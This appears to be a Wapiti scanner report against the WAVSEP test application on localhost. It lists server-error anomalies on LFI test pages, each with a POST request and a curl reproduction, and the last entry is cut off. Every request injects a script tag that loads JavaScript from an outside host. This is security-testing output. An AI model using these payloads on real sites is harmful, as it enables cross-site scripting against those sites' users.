Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case03-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultRelativeInput-AnyPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case03-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultRelativeInput-AnyPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case03-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultRelativeInput-AnyPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwpjzbq0a2bz.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case03-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultRelativeInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case03-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultRelativeInput-AnyPathReq-Read.jsp" -d "target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwpjzbq0a2bz.js%3E%3C%2Fscript%3E"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case04-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultRelativeInput-AnyPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case04-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultRelativeInput-AnyPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case04-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultRelativeInput-AnyPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwwl747bvjsz.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case04-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultRelativeInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case04-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultRelativeInput-AnyPathReq-Read.jsp" -d "target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwwl747bvjsz.js%3E%3C%2Fscript%3E"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case05-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-AnyPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case05-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-AnyPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case05-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-AnyPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwceggehjohz.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case05-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case05-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-AnyPathReq-Read.jsp" -d "target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwceggehjohz.js%3E%3C%2Fscript%3E"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case06-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-AnyPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case06-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-AnyPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case06-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-AnyPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwta5ucsue9z.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case06-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case06-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-AnyPathReq-Read.jsp" -d "target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwta5ucsue9z.js%3E%3C%2Fscript%3E"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case07-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-AnyPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case07-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-AnyPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case07-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-AnyPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwppjzi2jiiz.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case07-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case07-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-AnyPathReq-Read.jsp" -d "target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwppjzi2jiiz.js%3E%3C%2Fscript%3E"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case08-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-AnyPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case08-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-AnyPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case08-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-AnyPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw7lj3p1n5lz.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case08-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case08-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-AnyPathReq-Read.jsp" -d "target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw7lj3p1n5lz.js%3E%3C%2Fscript%3E"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case09-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-NoPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case09-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-NoPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case09-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-NoPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw63vhjjbd0z.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case09-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-NoPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case09-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-NoPathReq-Read.jsp" -d "target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw63vhjjbd0z.js%3E%3C%2Fscript%3E"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case11-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-NoPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case11-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-NoPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case11-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-NoPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwy6hcw799kz.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case11-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-NoPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case11-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-NoPathReq-Read.jsp" -d "target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwy6hcw799kz.js%3E%3C%2Fscript%3E"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case13-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-NoPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case13-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-NoPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case13-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-NoPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw4rx48pj1zz.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case13-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-NoPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case13-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-NoPathReq-Read.jsp" -d "target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw4rx48pj1zz.js%3E%3C%2Fscript%3E"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwsv5kvjh1pz.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp" -d "target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwsv5kvjh1pz.js%3E%3C%2Fscript%3E"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fws1inkquppz.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp" -d "target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fws1inkquppz.js%3E%3C%2Fscript%3E"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwcfyxpzz6kz.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp" -d "target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwcfyxpzz6kz.js%3E%3C%2Fscript%3E"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw18nuzs6mnz.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp" -d "target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw18nuzs6mnz.js%3E%3C%2Fscript%3E"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwz8vecrdavz.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp" -d "target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwz8vecrdavz.js%3E%3C%2Fscript%3E"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case23-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-BackslashPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case23-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-BackslashPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case23-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-BackslashPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwxd7ezqv95z.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case23-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-BackslashPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case23-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-BackslashPathReq-Read.jsp" -d "target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwxd7ezqv95z.js%3E%3C%2Fscript%3E"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwqlmqtnn8ez.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp" -d "target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwqlmqtnn8ez.js%3E%3C%2Fscript%3E"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case38-LFI-FileClass-FilenameContext-BackslashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case38-LFI-FileClass-FilenameContext-BackslashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case38-LFI-FileClass-FilenameContext-BackslashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwkc4p6uhr0z.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case38-LFI-FileClass-FilenameContext-BackslashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case38-LFI-FileClass-FilenameContext-BackslashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp" -d "target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwkc4p6uhr0z.js%3E%3C%2Fscript%3E"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwg5jshx0wbz.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp" -d "target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwg5jshx0wbz.js%3E%3C%2Fscript%3E"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case40-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case40-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case40-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw691b6b6krz.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case40-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case40-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp" -d "target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw691b6b6krz.js%3E%3C%2Fscript%3E"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case41-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case41-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case41-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwochaxi696z.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case41-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case41-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp" -d "target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwochaxi696z.js%3E%3C%2Fscript%3E"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

